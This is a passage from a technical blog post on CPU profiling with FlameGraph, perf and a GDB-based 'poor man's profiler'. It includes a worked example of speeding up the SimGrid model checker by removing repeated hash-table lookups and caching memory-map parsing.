If you have recursive calls you might want to merge them in order to\nhave a more readable view. This is implemented in my\nbranch\nby stackfilter-recursive.pl:

\n
# I want to merge recursive calls:\nperf script | stackcollapse-perf.pl | stackfilter-recursive.pl | grep MAIN | flamegraph.pl\n
\n\n\n

Update 2015-10-16: this has been merged upstream.

\n

Using FlameGraph with the poor man's profiler (based on GDB)

\n

Sometimes you might not be able to get relevant information with\nperf. This might be because you do not have debugging symbols for\nsome libraries you are using: you will end up with missing\ninformation in the stacktrace. In this case, you might want to use GDB\ninstead using the poor man's profiler\nmethod because it tends to be better at unwinding the stack without\nframe pointer and debugging information:

\n
# Sample an already running process:\npmp 500 0.1 $(pidof mycommand) > mycommand.gdb\n\n# Or:\nmycommand my_arguments &\npmp 500 0.1 $!\n\n# Generate the SVG:\ncat mycommand.gdb | stackcollapse-gdb.pl | flamegraph.pl > mycommand.svg\n
\n\n\n

Where pmp is a poor man's profiler script such as:

\n
#!/bin/bash\n# pmp - \"Poor man's profiler\" - Inspired by http://poormansprofiler.org/\n# See also: http://dom.as/tag/gdb/\n\nnsamples=$1\nsleeptime=$2\npid=$3\n\n# Sample stack traces:\nfor x in $(seq 1 $nsamples); do\n  gdb -ex \"set pagination 0\" -ex \"thread apply all bt\" -batch -p $pid 2> /dev/null\n  sleep $sleeptime\ndone\n
\n\n\n

Using this technique will slow the application a lot.

\n

Compared to the example with perf, this approach samples both on-CPU\nand off-CPU time.

\n

A real world example of optimisation with FlameGraph

\n

Here are some figures obtained when I was optimising the\nSimgrid\nmodel checker\non a given application\nusing the poor man's profiler to sample the stack.

\n

Here is the original profile before optimisation:

\n
\n\n \n\n
FlameGraph before optimisation
\n
\n\n

Avoid looking up data in a hash table

\n

Nearly 65% of the time is spent in get_type_description(). In fact, the\nmodel checker spends its time looking up type description in some hash tables\nagain and over again.

\n

Let's fix this and store a pointer to the type description instead of\na type identifier in order to avoid looking up those type over\nand over again:

\n
\n\n \"[profile\n\n
FlameGraph after avoiding the type lookups
\n
\n\n

Cache the memory areas addresses

\n

After this modification,\n32% of the time is spent in libunwind get_proc_name() (looking up\nfunctions name from given values of the instruction pointer) and\n12% is spent reading and parsing the output of cat\n/proc/self/maps over and over again. Let's fix the second issue first\nbecause it is simple, we cache the memory mapping of the process in\norder to avoid parsing /proc/self/maps all of time.

\n
\n\n \"[profile\n\n
FlameGraph after caching the /proc/self/maps output
\n
\n\n

Speed up function resolution

\n

Now, let's fix the other issue by resolving the functions\nourselves. It turns out, we already had the address range of each function\nin memory (parsed from DWARF informations). All we have to do is use a\nbinary search in order to have a nice O(log n) lookup.

\n
\n\n \"[profile\n\n
FlameGraph after optimising the function lookups
\n
\n\n

Avoid looking up data in a hash table (again)

\n

Still 10% of the time is spent looking up type descriptions from type\nidentifiers in a hash tables. Let's store the reference to the type\ndescriptions and avoid this:

\n
\n\n \"profile\n\n
FlameGraph after avoiding some remaining type lookups
\n
\n\n

Result

\n

The non-optimised version was taking 2 minutes to complete. With\nthose optimisations, it takes only 6 seconds \"\ud83d\ude2e\". There is\nstill room for optimisation here as 30% of the time is now spent in\nmalloc()/free() managing heap information.

\n

Remaining stuff

\n

Sampling other events

\n

Perf can sample many other kind of events (hardware performance\ncounters, software performance counters, tracepoints\u2026). You can get\nthe list of available events with perf list. If you run it as\nroot you will have a lot more events (all the kernel tracepoints).

\n

Here are some interesting events:

\n\n

More information about some perf events can be found in\nperf_event_open(2).

\n

You can then sample an event with:

\n
perf record --call-graph dwarf -e cache-misses myapp\n
\n\n\n
\n\n \"[FlameGraphe\n\n
FlameGraph of cache misses
\n
\n\n

Ideas

\n\n

Extra tips

\n\n

References

\n\n
\n
\n
    \n
  1. \n

    When using frame pointer unwinding, the kernel unwinds the stack\nitself and only gives the instruction pointer of each frame to\nperf record. This behaviour is triggered by the\nPERF_SAMPLE_CALLCHAIN sample type.

    \n

    When using DWARF unwinding, the kernels takes a snaphots of (a\npart of) the stack, gives it to perf record: perf record\nstores it in a file and the DWARF unwinding is done afterwards by\nthe perf tools. This uses\nPERF_SAMPLE_STACK_USER. PERF_SAMPLE_CALLCHAIN is used as well\nbut for the kernel-side stack (exclude_callchain_user).\u00a0\u21a9

    \n
  2. \n
\n
"}]}